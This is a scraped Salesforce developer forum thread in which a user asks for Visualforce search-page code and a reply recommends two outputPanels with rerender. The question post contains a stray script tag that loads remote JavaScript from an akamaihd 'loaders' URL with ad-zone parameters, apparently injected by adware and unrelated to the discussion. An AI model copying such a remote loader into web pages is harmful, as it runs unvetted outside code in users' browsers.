function readOnly(count){ }
Starting November 20, the site will be set to read-only. On December 4, 2023,
forum discussions will move to the Trailblazer Community.
+ Start a Discussion
srvas137srvas137 

implementing search functionality

my contain one selectlist (for selecting object fields),two textboxes for selecting dates(startdate and end date)

and one more search button

 

display object data in same visualforce page when i cllick a search button

 

 

this my requirement

 

if anyone knw this code please post me urgent

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
ignatiuz_forceignatiuz_force

you need to have two outputpanels in the VF page and use the rendered and rerender attributes.

 

First outpanel will have the selectlist,textbox and search button. When search is clicked rerender the second outputpanel and display the results.